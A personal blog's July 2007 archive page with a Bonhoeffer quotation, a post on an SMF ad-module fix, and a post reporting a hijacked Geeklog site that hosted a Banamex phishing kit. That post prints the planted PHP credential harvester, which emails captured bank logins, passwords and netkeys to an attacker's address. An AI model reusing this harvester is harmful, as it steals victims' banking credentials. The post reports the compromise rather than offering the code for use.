« June 2007 | Main | November 2007 »

July 2007 Archives

July 10, 2007

Be not anxious!

Bonhoeffer writes:

Be not anxious! Earthly possessions dazzle our eyes and delude us into thinking that they can provide security and freedom from anxiety. Yet all the time they are the very source of all anxiety. If our hearts are set on them, our reward is an anxiety whose burden is intolerable. Anxiety creates its own treasures and they in turn beget further care. When we seek for security in possessions we are trying to drive out care with care, and the net result is the precise opposite of our anticipations. The fetters which bind us to our possessions prove to be cares themselves. [emphasis mine]

"Bana" banamex scam

I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:


$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");

//sending email info here

$subj = "Bancanet - Banamex";
$from = "From: Info";
mail("devilzx0@gmail.com", $subj, $message, $from);
header("Location: verificacion.htm");

My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verficacion.htm:

file:///D:/Banking/Scams/Scam/Upload%20Scam/Upload%20Venezuela/Mis%20documentos/Mis%20archivos%20recibidos/letter_files/nuevobnp.css

How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":

href="http://centralbanamex.com.istemp.com/banamex/"

Anyone know anything about this?

Update: Here's the phishing alert. It's from 2005.

July 13, 2007

Resolving the missing Ad Management link (SMF 1.1.3)

Symptom: Installing Ad Management for SMF 1.1.3 from smfads.com indicates success. No Ad Management link is present under Configuration tab. However, inspection (view source) reveals an incomplete link, in my case to

index.php?action=admod

with no parameters. The incomplete link can be visually checked by noticing the extra space between Configuration and the next tab.

Resolution: Per jerm, the issue has to do with english versus english-utf8. The current version "ad_mod_1-1-x_v2-3" creates a file called "Ads.english.php" in the languages folder of the default directory. A quick glance at the 1.1.3 install (and probably a few subversions back) shows that a copy should probably be made for "Ads.english-utf8.php". Create this copy by hand for quick resolution OR alternatively, installing using ad_mod_1-1-x_v2-3x (simple hack to include utf8 copy). The only real change to the package is the addition of Ads.english-utf8.php (copy), and adding the following line to package-info.xml to read:

require-file name="Ads.english-utf8.php" destination="$languagedir"

Let me know if there are any issues or if you found the hack helpful.

About July 2007

This page contains all entries posted to Tim's Journal in July 2007. They are listed from oldest to newest.

June 2007 is the previous archive.

November 2007 is the next archive.

Many more can be found on the main index page or by looking through the archives.

Creative Commons License
This weblog is licensed under a Creative Commons License.
Powered by
Movable Type 3.35